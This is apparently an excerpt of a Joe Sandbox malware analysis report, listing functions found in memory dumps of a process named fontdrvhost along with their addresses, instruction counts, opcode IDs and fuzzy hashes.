                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 56f6dba99b4e4e91b49085bfc3230689d0356e0fdfdc83b7dc4830f6b4cae8e5
                                                                    • Instruction ID: 4c373a07a24309641f221038a2b92b16f48506c9ee81f9405bfda9d1781c3ad7
                                                                    • Opcode Fuzzy Hash: 56f6dba99b4e4e91b49085bfc3230689d0356e0fdfdc83b7dc4830f6b4cae8e5
                                                                    • Instruction Fuzzy Hash: CD81E130A09B478FE365DB54D1A057177B1FF44348F90467EE08E87A92EB29B892DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F08D0 Relevance: .2, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50148dee668535c172617754024bee9696c3f42c1edfd91a355eb436bb78738c
                                                                    • Instruction ID: b194ba83acfbe19eda78c2077cead2895b48268f023a2a203773cd6ba3d14d52
                                                                    • Opcode Fuzzy Hash: 50148dee668535c172617754024bee9696c3f42c1edfd91a355eb436bb78738c
                                                                    • Instruction Fuzzy Hash: A051BE31B1855E8FDB44FFA8E4A5AEC7BE0EF58324F0401BAD44AD7196CA25A885C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F1715 Relevance: .1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b676556d358c4db7587b239f24e37089d61dfae4b37a70a3a34a0f4963ac9848
                                                                    • Instruction ID: 7bda44fcafabc0605c0566391a9c6930cb1580f38c1c2def692d1d18f43da3a9
                                                                    • Opcode Fuzzy Hash: b676556d358c4db7587b239f24e37089d61dfae4b37a70a3a34a0f4963ac9848
                                                                    • Instruction Fuzzy Hash: AD51A331B1A69E9FEB60EB68C8586E9BBE0FF55324F0540B6D04DD71A1DE346E84CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0908 Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc1d3c74830843a3c570cd6fe8076c2155baf6b8ddb51494b4f2e55cf6d343e0
                                                                    • Instruction ID: a6c96655a1b12fde8e0ae435f97998376b5933c7618cad5b3418539ded9740d5
                                                                    • Opcode Fuzzy Hash: cc1d3c74830843a3c570cd6fe8076c2155baf6b8ddb51494b4f2e55cf6d343e0
                                                                    • Instruction Fuzzy Hash: 8E517A70A0590E9FCF84EF98D494EEDBBF1FF69324F050169E409E7260DA74E9908B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D800C Relevance: .1, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 981a1e706b055a7563d5b499efbe8d77e1d428d33d66d9df0c3dce123a308a20
                                                                    • Instruction ID: d1b2216522cde4bcc0ee233097caf6d798f9742263e88f4da63e0c62292f8473
                                                                    • Opcode Fuzzy Hash: 981a1e706b055a7563d5b499efbe8d77e1d428d33d66d9df0c3dce123a308a20
                                                                    • Instruction Fuzzy Hash: 7A41093094E3CA4FE7579364D8265F53FB0EF83364F0402FAE0898A0A3E7555516C782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D0CD7 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20a157f2d120df9eede4dd7747ed50c426ae49929062b469dedc47293250adfb
                                                                    • Instruction ID: 204173c91a0f92124ccc980b19ab1f7d2dc8d30ee384fab1147a1e50ac9c207e
                                                                    • Opcode Fuzzy Hash: 20a157f2d120df9eede4dd7747ed50c426ae49929062b469dedc47293250adfb
                                                                    • Instruction Fuzzy Hash: 85412D3270CA498FDFA8FF5CC4A5DA4B7E1EBA8314B04416AD44EC3192DE25EC95CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F1613 Relevance: .1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b28162806247b7128604a80d996486f30f95091ade69c2e6d66bcd4037f67a8
                                                                    • Instruction ID: b8c9918408b252c7adab4369acd6a2bbc8a94f4b2d62cc04c9c5b16649186f6b
                                                                    • Opcode Fuzzy Hash: 3b28162806247b7128604a80d996486f30f95091ade69c2e6d66bcd4037f67a8
                                                                    • Instruction Fuzzy Hash: 7F316E27F0E25A1FE711BBADA4B55E93B90EF91339F0901B3C1D9CA0A3EC15690D8291
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0998 Relevance: .1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5edc1ecf706ffd5334a60c543c44ddcb3102be4f62d39fcef93b1f9f92715c8
                                                                    • Instruction ID: fa48013cc257ba6343a44a6f72895f1bacbb9e17080604b9a225961ede6751a7
                                                                    • Opcode Fuzzy Hash: a5edc1ecf706ffd5334a60c543c44ddcb3102be4f62d39fcef93b1f9f92715c8
                                                                    • Instruction Fuzzy Hash: A2412870A1495D8FDF94EF98C895AEDBBF1FF68314F10016AE409E3295CA34A981CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F5BE8 Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da226102d091921df8ecc4dd443870febb15f0f84607e07656d8cfe43ed797ef
                                                                    • Instruction ID: ae8a82158b6e175ec1a1748f9133b508587dd11275079c00a107cce3c8218b59
                                                                    • Opcode Fuzzy Hash: da226102d091921df8ecc4dd443870febb15f0f84607e07656d8cfe43ed797ef
                                                                    • Instruction Fuzzy Hash: 0041A5B0A0492C8FDBA4DB14C854BE9B7F0EB68315F1041EAD10EE72A5DA756EC48F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D804A Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction ID: b2bdedd852cdc7de9227cea8618b8a76f80c73495762620138bd37661289af39
                                                                    • Opcode Fuzzy Hash: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction Fuzzy Hash: A231072094E3C64FE753937498696E53F716F43364F1802EAE089CA4E3EB990409D752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9879 Relevance: .1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1eb5cebe5e0950107ef687ce7d6a742ee97781c78da39ea1038f5e154b8ddeee
                                                                    • Instruction ID: 058db24fbfdf6b5b6ef40050821e5e25dad2cff3e7c1305efd432565e435cb28
                                                                    • Opcode Fuzzy Hash: 1eb5cebe5e0950107ef687ce7d6a742ee97781c78da39ea1038f5e154b8ddeee
                                                                    • Instruction Fuzzy Hash: 9131FE70E1861E9FDFA8DB58D4A5AADB7B1EF58310F0141BED01EE3291DF3469819B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F13C8 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fecae00b085479b74c4e73143c5dfcef38fdc03e7d89f10e5b8c50f340b327e
                                                                    • Instruction ID: 46b15a50f4f692deda7187bb994d4cefe8e82a4346de47b0791baa3fb9227d56
                                                                    • Opcode Fuzzy Hash: 1fecae00b085479b74c4e73143c5dfcef38fdc03e7d89f10e5b8c50f340b327e
                                                                    • Instruction Fuzzy Hash: 71318D30F2964E8BDB64EB98C8657BD7BB1FF49310F11417AD00AD32E6DA742A448B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D8E37 Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc12f7dcdcd00c651e95fc8ad82292ed9f17071a2421fbac4d2a305d2d34e336
                                                                    • Instruction ID: 3ad1642e73d400862dfc2942a1559a5d88a44d51cd30540fcc560e00ec19c533
                                                                    • Opcode Fuzzy Hash: fc12f7dcdcd00c651e95fc8ad82292ed9f17071a2421fbac4d2a305d2d34e336
                                                                    • Instruction Fuzzy Hash: 97310F71F1891F9FEBA4EB88C4A29BC77B1FF58340F504775E00ED6195EB246841AB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0C25 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d05a1684d07cf4cacda93cc37782fc4d8cc1ec9d8c53a1f2bd9df74ff10f958f
                                                                    • Instruction ID: 84f2ee0f62d444cc9529da1988d3f8ccf0afe15198b997a88afee3c73a9e0c61
                                                                    • Opcode Fuzzy Hash: d05a1684d07cf4cacda93cc37782fc4d8cc1ec9d8c53a1f2bd9df74ff10f958f
                                                                    • Instruction Fuzzy Hash: 86313935F1D68E8BE712AFA4C8203FD7BA4EF81320F05457BC5559B1E2CA782A49CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D98C2 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30df9b9fddc1dec6ae20dd9f7a83c8c1fd812244585901fea78d9c28f6d06b8c
                                                                    • Instruction ID: 3e9af377e3347d5ccbb3d8fbb09c06d6e6ae41204720d35141844a3116978fa7
                                                                    • Opcode Fuzzy Hash: 30df9b9fddc1dec6ae20dd9f7a83c8c1fd812244585901fea78d9c28f6d06b8c
                                                                    • Instruction Fuzzy Hash: 8D21FB31E0891D8FDF98EB58D4A5AECB7B1FF68310F0141AA901EE3291DF35A9818B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F5D41 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59a81896139ad43bd544ade613f59ae588c37099ed38480218a79a9b7930bab7
                                                                    • Instruction ID: 1d057459066e463277ea77f888c11b70766718b1bed85adc0c55bb39badec94e
                                                                    • Opcode Fuzzy Hash: 59a81896139ad43bd544ade613f59ae588c37099ed38480218a79a9b7930bab7
                                                                    • Instruction Fuzzy Hash: 1331B670A0491C8FCFA8DB18C854BE9B7F1EB68315F1041EAD10EE32A5DA31AE85CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F11A2 Relevance: .1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89c6d9eab7bbc896e22dd2571b0b627c66fba6823d6071a69e7f998d3628667c
                                                                    • Instruction ID: ce70bbca6ecbbbf7971dad198337101258809807fecff57ba30377ca916b758a
                                                                    • Opcode Fuzzy Hash: 89c6d9eab7bbc896e22dd2571b0b627c66fba6823d6071a69e7f998d3628667c
                                                                    • Instruction Fuzzy Hash: F4212A30B1891E9FEB94EFA8C8949ADBBF1FF68310B11457AD419D32A1DB34A941CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D95C1 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0012a382086178f3493de69f6542f28661131eccfde9ffe59b2f120a4d927c0
                                                                    • Instruction ID: b5c1f4563d3cba8382dbb581edc442c24fefda3603d17bcbc75568b8e0a6ed7d
                                                                    • Opcode Fuzzy Hash: b0012a382086178f3493de69f6542f28661131eccfde9ffe59b2f120a4d927c0
                                                                    • Instruction Fuzzy Hash: 7A11E012F4D39386FA7926E468314BD2674AF457A0F5903BAF84E830C6FE0D28853392
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0C38 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7733f2f6c5f779523dd4d16b23e8e383c3dd7205050683889bc3e77df055de7c
                                                                    • Instruction ID: 15843f623d7fd5c73c94f581ed6aac20d90f9a8e8b5a9e17c2762bd9094347f0
                                                                    • Opcode Fuzzy Hash: 7733f2f6c5f779523dd4d16b23e8e383c3dd7205050683889bc3e77df055de7c
                                                                    • Instruction Fuzzy Hash: 3D114C35B1D64E4AE712EFA4C8202EE7B64EF81330F054877C5919B2E2DA3857098790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0B7F Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 37a98bd3055f00c31a4e31e0dc0be2cfd83693e0a35c47f6e54c2191aaab4cc0
                                                                    • Instruction ID: 1300a791a80087d17cf2ae35e7a9a46252d86d72420fc46f3581aaed59c6b999
                                                                    • Opcode Fuzzy Hash: 37a98bd3055f00c31a4e31e0dc0be2cfd83693e0a35c47f6e54c2191aaab4cc0
                                                                    • Instruction Fuzzy Hash: 1F117C71A2864D8FCF44EF28C895AEA77E0FF58318F05016AE84DD3251D730A554CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0C40 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfc19ac8a72230b4cd01d2ab7b73dfe46d9e40aecc30a1bfc516a68747601e4e
                                                                    • Instruction ID: 1e93147d3ab5d5069b2a2acc69737fefb1c255a6eed6099858321882de01bba3
                                                                    • Opcode Fuzzy Hash: cfc19ac8a72230b4cd01d2ab7b73dfe46d9e40aecc30a1bfc516a68747601e4e
                                                                    • Instruction Fuzzy Hash: F2012B31B0D68E4AE712EFA4C8202EE7B64EF81320F054577D5519B2E2CA345709C790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9542 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc518725d1d808e9689f9482acac8a3fcd16afa6d8c726afaaf40020a09bd645
                                                                    • Instruction ID: 6647327c6521d74613cfff41389b755a44f847942f4ab85da935985ab04b69f4
                                                                    • Opcode Fuzzy Hash: bc518725d1d808e9689f9482acac8a3fcd16afa6d8c726afaaf40020a09bd645
                                                                    • Instruction Fuzzy Hash: 66119534E2891EDFDBA8EB98D4A09ADB7B1FF58344F500679E00EE3295DF3468419B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F2303 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction ID: 0a6dab3eb7c05c803750d3aff1e62620a2586a089ecffbc979876acd7aabcf43
                                                                    • Opcode Fuzzy Hash: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction Fuzzy Hash: F021C470A1A62D8EEB64EF54CC59BA8B7B1EB54315F1042E9D40DA22A1DB342EC4CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0845 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 553313a947f84ee103d180bc82a783c01370319039905ccd2b4a309d66472c54
                                                                    • Instruction ID: 311dbcc977114fc71c7ab2077bc6ae1a30d599f9610e9069a6cf4c36e8bc1b01
                                                                    • Opcode Fuzzy Hash: 553313a947f84ee103d180bc82a783c01370319039905ccd2b4a309d66472c54
                                                                    • Instruction Fuzzy Hash: 02012C3060894D9FDB84EF58D895AEE7BA0FF29301F0101A6F858C3161CA30E5A5CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F670C Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eda37f5a71ef9d6abfb522fdcd4f1be2120cb5ad074b452d1a95ec35805b8fbb
                                                                    • Instruction ID: ad70b7f0453b2c472c38b9f71293bfd0decb606d116b5e38b7e53b4a68d977fe
                                                                    • Opcode Fuzzy Hash: eda37f5a71ef9d6abfb522fdcd4f1be2120cb5ad074b452d1a95ec35805b8fbb
                                                                    • Instruction Fuzzy Hash: 54011730A0556A8EEB64EB18C8587E9B7B1EB44315F1082F5941DA22A9DA742E85CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F06A5 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6c330b346ef2d58b532aa9d458e79c11696b0cd131a1d5015f62c7120a330bc
                                                                    • Instruction ID: 1da46ab1808b1c98a10b486f5b064817a20cacaf2c24a1efa84e131ead561625
                                                                    • Opcode Fuzzy Hash: c6c330b346ef2d58b532aa9d458e79c11696b0cd131a1d5015f62c7120a330bc
                                                                    • Instruction Fuzzy Hash: 4AF03030E1560EAFEB50EFA8D4596ED7BE4FF54315F114537E41CC21A0DA7566908780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F06C8 Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d66a6791a6e0518b251df3bcc2ab13295a0f509cc9937d2c9b475ac698c97a5
                                                                    • Instruction ID: f6fcd3822f51caf706fcc5706a46c04c2f8794202a2f82574c8fc5060bfed5ba
                                                                    • Opcode Fuzzy Hash: 4d66a6791a6e0518b251df3bcc2ab13295a0f509cc9937d2c9b475ac698c97a5
                                                                    • Instruction Fuzzy Hash: C1F01230D1564D9FDB90EFA4C4496EA7BE0FF14304F014466E81CD2160DA74A6A0CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F0B18 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20ca368dbdebafa6f2847212a4e8fe4ccd20555cba187c5e0699008305c5604e
                                                                    • Instruction ID: 22f83177245e1b8bc77db380529c7760c0575970f6a3946ddc3a1f24b15b04b7
                                                                    • Opcode Fuzzy Hash: 20ca368dbdebafa6f2847212a4e8fe4ccd20555cba187c5e0699008305c5604e
                                                                    • Instruction Fuzzy Hash: 9CF01530509A0ECFDF90EF68C944AAA37A1FF29300F000165F45DC31A4CB70EAA0CB81
                                                                    Uniqueness

